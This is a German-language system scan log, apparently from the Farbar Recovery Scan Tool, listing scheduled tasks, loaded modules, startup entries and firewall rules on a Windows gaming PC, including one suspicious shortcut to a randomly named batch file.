Task: {96B4A76A-E0A9-497A-B6C0-43AC09DF5333} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation)
Task: {98644CA8-C542-4436-AFE3-3272F8AD1B07} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {A1DC91F7-197C-4208-AE19-8D4190EB04A4} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-07-26] (NVIDIA Corporation)
Task: {A36A36C9-7C2C-4BAB-8C32-209FE107A789} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google Inc.)
Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {A803118B-8018-4040-B0AB-DEBB70589A5F} - System32\Tasks\Driver Booster SkipUAC (*****) => C:\Program Files (x86)\IObit\Driver Booster\4.5.0\DriverBooster.exe
Task: {AAFBDA33-C21C-4668-9CAF-14B06F45FC3D} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation)
Task: {B5B3C199-8D05-4D87-98CE-C413AAFB8290} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-07-26] (NVIDIA Corporation)
Task: {B75DE4BB-2CA4-4515-85EA-0B346AAB0160} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {B8F24EEC-1F14-4791-AFC9-1BB058D7BAA4} - System32\Tasks\Uninstaller_SkipUac_Martin_Walser => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe
Task: {B918F1B1-79A9-45D6-8195-051607EF371D} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {C1A8AE88-41C5-4E46-BD3E-B0C94C9179A9} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d25a61a78c34b7 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {D2EEA344-C1E2-4667-98B9-3F9655F456C6} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d25a61a7879fb6 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\StartMenu8_Start.job => C:\Program Files (x86)\IObit\Classic Start\Start_Active.exe
Task: C:\WINDOWS\Tasks\Uninstaller_Install_Martin_Walser.job => C:\Program Files (x86)\IObit\Advanced SystemCare\ActionCenterDownloader.exe
Task: C:\WINDOWS\Tasks\Uninstaller_SkipUac_Martin_Walser.job => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)


Shortcut: C:\Users\*****\AppData\Local\Rvurcez\bdobyjg.lnk -> C:\Users\*****\AppData\Local\Bizpiwcinu\arvikxihn.bat ()

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2017-03-18 22:58 - 2017-03-18 22:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-18 22:59 - 2017-03-20 06:36 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-07-18 00:26 - 2017-07-18 00:26 - 000074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-07-18 00:26 - 2017-07-18 00:26 - 000203264 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-07-18 00:26 - 2017-07-18 00:26 - 043573248 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-07-18 00:26 - 2017-07-18 00:26 - 002435584 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\skypert.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2017-01-24 00:19 - 2017-01-24 00:19 - 001096824 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2017-01-24 00:19 - 2017-01-24 00:19 - 000241784 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2017-06-30 13:22 - 2017-06-30 13:22 - 000069632 _____ () C:\Program Files\CCleaner\lang\lang-1031.dll
2014-09-19 17:15 - 2014-09-19 17:15 - 000330240 _____ () C:\Program Files\Qualcomm Atheros\Network Manager\NetworkManager.exe
2012-09-13 00:38 - 2012-09-13 00:38 - 000264040 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
2016-09-29 12:59 - 2017-07-26 19:09 - 001267136 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-07-28 18:14 - 2017-07-26 19:08 - 000034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
2017-07-28 18:14 - 2017-07-26 19:08 - 000920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2017-07-31 20:55 - 2017-04-18 19:01 - 002493440 _____ () G:\Program Files (x86)\Origin\libGLESv2.dll
2014-09-11 17:06 - 2014-09-11 17:06 - 000878592 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\platforms\qwindows.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000036352 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\bearer\qgenericbearer.dll
2014-09-11 17:06 - 2014-09-11 17:06 - 000038912 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\bearer\qnativerwifibearer.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000032256 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qdds.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000021504 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qgif.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000027648 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qicns.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000021504 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qico.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000381952 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qjp2.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000204800 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qjpeg.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000218112 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qmng.dll
2014-09-11 17:08 - 2014-09-11 17:08 - 000015872 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qsvg.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000015360 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qtga.dll
2014-09-11 17:15 - 2014-09-11 17:15 - 000307712 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qtiff.dll
2014-09-11 17:15 - 2014-09-11 17:15 - 000014848 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qwbmp.dll
2014-09-11 17:15 - 2014-09-11 17:15 - 000252928 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qwebp.dll
2017-06-01 23:04 - 2017-05-17 03:54 - 000678176 _____ () G:\Program Files (x86)\Steam\SDL2.dll
2017-07-24 18:15 - 2017-07-18 02:33 - 002497824 _____ () G:\Program Files (x86)\Steam\video.dll
2017-03-18 00:47 - 2016-09-01 03:02 - 004969248 _____ () G:\Program Files (x86)\Steam\v8.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000491008 _____ () G:\Program Files (x86)\Steam\libavformat-56.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000332800 _____ () G:\Program Files (x86)\Steam\libavresample-2.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000442880 _____ () G:\Program Files (x86)\Steam\libavutil-54.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 002549760 _____ () G:\Program Files (x86)\Steam\libavcodec-56.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000485888 _____ () G:\Program Files (x86)\Steam\libswscale-3.dll
2017-03-18 00:47 - 2016-09-01 03:02 - 001195296 _____ () G:\Program Files (x86)\Steam\icuuc.dll
2017-03-18 00:47 - 2016-09-01 03:02 - 001563936 _____ () G:\Program Files (x86)\Steam\icui18n.dll
2017-07-24 18:15 - 2017-07-18 02:33 - 000884512 _____ () G:\Program Files (x86)\Steam\bin\chromehtml.DLL
2017-03-18 00:47 - 2016-07-05 00:17 - 000266560 _____ () G:\Program Files (x86)\Steam\openvr_api.dll
2016-04-09 00:35 - 2016-04-09 00:35 - 003481600 _____ () C:\Users\*****\AppData\Local\Programs\Google\Google Photos Backup\gpuploader_i18n.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 002144104 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 000341352 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 007955304 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 000028008 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 000127336 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll
2012-09-13 00:39 - 2012-09-13 00:39 - 000336232 _____ () C:\Program Files (x86)\Common Files\logishrd\LWSPlugins\LWS\Applets\CameraHelper\DevManagerCore.dll
2017-06-08 20:06 - 2017-05-17 03:54 - 000678176 _____ () G:\Program Files (x86)\Steam\bin\cef\cef.win7\SDL2.dll
2017-07-12 19:34 - 2017-07-06 19:58 - 073088800 _____ () G:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll
2017-07-24 18:15 - 2017-07-18 02:33 - 000384288 _____ () G:\Program Files (x86)\Steam\steam.dll
2017-01-29 16:41 - 2017-07-26 19:09 - 001040320 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-03-11 14:34 - 2015-12-29 12:30 - 000355616 _____ () C:\Program Files (x86)\IObit\Classic Start\madExcept_.bpl
2017-03-11 14:34 - 2015-12-29 12:29 - 000190240 _____ () C:\Program Files (x86)\IObit\Classic Start\madBasic_.bpl
2017-03-11 14:34 - 2015-12-29 12:30 - 000057632 _____ () C:\Program Files (x86)\IObit\Classic Start\madDisAsm_.bpl
2017-03-11 14:34 - 2015-12-29 12:30 - 000059680 _____ () C:\Program Files (x86)\IObit\Classic Start\parseAuto.dll
2017-03-11 14:34 - 2015-12-29 12:30 - 000275576 _____ () C:\Program Files (x86)\IObit\Classic Start\sqlite3.dll
2017-03-11 14:34 - 2015-12-29 12:31 - 000047904 _____ () C:\Program Files (x86)\IObit\Classic Start\winkey.dll
2017-04-19 23:18 - 2017-04-19 23:18 - 067725936 _____ () C:\Users\*****\AppData\Roaming\Spotify\libcef.dll
2017-04-19 23:18 - 2017-04-19 23:18 - 000110192 _____ () C:\Users\*****\AppData\Roaming\Spotify\SpotifyWinRT.dll
2017-04-19 23:18 - 2017-04-19 23:18 - 001929840 _____ () C:\Users\*****\AppData\Roaming\Spotify\libglesv2.dll
2017-04-19 23:18 - 2017-04-19 23:18 - 000087152 _____ () C:\Users\*****\AppData\Roaming\Spotify\libegl.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\ProgramData\TEMP:CB0AACC9 [135]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


Da befinden sich 4789 mehr Seiten.


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2013-08-22 15:25 - 2013-08-22 15:25 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\*****\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\fantasy.jpg
DNS Servers: 62.2.24.162 - 62.2.17.61
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

MSCONFIG\Services: PDF Architect 5 Manager => 2
HKLM\...\StartupApproved\StartupFolder: => "UE Music Library-Taskleisten-Tool.lnk"
HKLM\...\StartupApproved\StartupFolder: => "simplicheck.lnk"
HKLM\...\StartupApproved\Run32: => "UpdReg"
HKLM\...\StartupApproved\Run32: => "Raptr"
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\StartupApproved\StartupFolder: => "Dropbox.lnk"
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\StartupApproved\Run: => "BingSvc"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{A48CA470-A870-4179-B1B2-4E1B515CF8CC}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe
FirewallRules: [{15C73935-9422-4FF2-8044-5909C2A58895}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe
FirewallRules: [UDP Query User{9EE745C2-5DD7-43D6-AC1A-F4CB56837C77}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [TCP Query User{7CDC35E1-0481-4B34-B7A2-07A7BF9EA6B4}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{02439386-6E1B-4B1A-85CE-2BAEDC630B7D}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe
FirewallRules: [TCP Query User{21237B05-7282-4B4E-A1B9-166036A3F782}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe
FirewallRules: [UDP Query User{DF239A90-3015-4A02-9683-656B9FF43E4E}G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe
FirewallRules: [TCP Query User{ACCBBD61-2F9E-4EB0-85D4-5BA97DE3FBCF}G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe
FirewallRules: [{0D1B9AD2-C22B-49E0-A70F-ACB9065E4C01}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe
FirewallRules: [{E0EEBF19-98E6-42DE-BFD5-648FE1CAC4EA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe
FirewallRules: [UDP Query User{A99BD097-FB9C-4197-B13A-5C40B5146AE9}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [TCP Query User{2AAE67D8-35FC-4732-ACEC-7220F4914FE7}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [UDP Query User{E7165155-1031-43E7-9F56-B39F3081C3FC}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe
FirewallRules: [TCP Query User{015D5357-1B6C-4BB6-8E04-A92E4DEE27D8}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe
FirewallRules: [{9D819DCB-2F2A-4F0C-8B4E-BAF745DDCDAA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe
FirewallRules: [{6AD5DAF0-AD0C-4397-80FB-784D39972676}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe
FirewallRules: [{BC6EB3F3-2A98-46F0-9150-BCC21E2A56E7}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{F69BB511-8722-4AC1-826A-17EF9DF0BC0E}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{B4593F94-2FA0-4595-B476-E2B14AA8F5C2}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe
FirewallRules: [{4C81C009-BCAE-43D4-9498-8EAE2B0A4C6A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe
FirewallRules: [{310A94E6-73AC-4ED9-B2FC-0B186AB40DE6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{B32AAF55-10AB-4914-B9AE-52159DE5512C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe
FirewallRules: [{B09ADEED-B680-4B72-900B-77D2C4F2650F}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe
FirewallRules: [{49966F41-9BFA-48F3-A63D-8FACAF2E5036}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe
FirewallRules: [{2FC5A6BD-BF05-4164-89C1-16FE7BF2BAE1}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe
FirewallRules: [{C2397ABC-794C-40AF-A15E-DA816A4EC318}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe
FirewallRules: [{B1052126-2905-42E2-956D-850CCD9C1014}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe
FirewallRules: [UDP Query User{0FF06ECA-E1F0-41B0-8FCD-126D174715D0}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [TCP Query User{6928C914-94B4-4F89-99D1-4AA5BBD06AFC}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [UDP Query User{98FBAFC3-976A-4164-813B-40F32032BBDF}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [TCP Query User{8030943B-531A-4F01-9F2A-FF946F4B1285}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [UDP Query User{54BD8357-54B2-4494-9854-D8EDB5EC5113}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{BA245DA0-2241-46ED-8F5B-6B4A4A9FF1F7}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{2B51C0D6-D4E8-4CC0-8271-F4A911C2F406}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [TCP Query User{437D4E9B-EC49-4CF6-8CD2-921830F6564C}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [{39430812-9852-49ED-9F86-904CB000274A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{7376B877-0383-44F7-909E-07F9D738AFA7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{22067E9A-32F2-40FF-AC7A-01F94C55642C}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe
FirewallRules: [{8D47AC7F-25CB-4C41-A7BA-EF713FCE93CF}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe
FirewallRules: [{A7EEE726-FE30-4C66-8AD5-93D5C3C96B07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe
FirewallRules: [{87C53834-94A0-4EEA-B4F5-6311177D9A07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe
FirewallRules: [{EA9F2049-950D-439D-85B9-02D649D73245}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{247328BE-4699-4A3F-A6CA-661592F926AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{DD07B558-9E11-4AAD-9B6D-7B75E3B4B53B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{F4996C83-AA13-4703-B61B-4A89884F8B90}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{679B2599-B113-4728-B3FA-84E705F0BBDD}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [{96341DDC-B74C-4FDE-A455-66A4B4835DF6}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [{6818289E-239B-49EE-B001-FB69A2E6A8C0}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe
FirewallRules: [{F0859AC3-60E3-4D00-B630-170BF1C441E5}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe
FirewallRules: [{B515A77B-C22A-4D35-957F-4BC619063FF5}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe
FirewallRules: [{42C09225-0BCA-4B7A-A912-874BA402CA17}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe
FirewallRules: [{4F1029AB-0FBD-45F8-9898-689A2D6F9BAC}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{679F21A3-8A59-45B3-8C1E-EFE5E0710C63}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [TCP Query User{FB088684-BBC4-4D8B-BBAF-5842DA9EE196}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{2A8CE33E-EC98-4518-B46D-42E1DEA51F46}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [{4D766A26-785C-455E-B90F-F910A14E7B7F}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{451F15F9-2D6B-46B6-ACB5-710CD2226BDD}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [TCP Query User{37632275-71A2-49D8-A0FA-70CCB7875F1E}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [UDP Query User{2314FC4F-415A-4DF3-AA49-81CFB9ACE68A}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [TCP Query User{DA695000-4AF9-41AF-9754-C8FA4C6954C1}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{8D614418-EAB5-437D-8C47-BA5ACE131844}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{A397AF39-676F-4717-8C88-59C336141F49}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{E5A7347B-77B2-483E-8FE8-4CAA8722A8D3}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{7409D24F-3B4B-47E4-91B8-98CDC53334D0}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{4B5DB8A4-B9FF-49E3-A8CF-8F2DDDB8F35E}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{F723C80F-371B-4A95-8F54-FA07E9E42973}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe
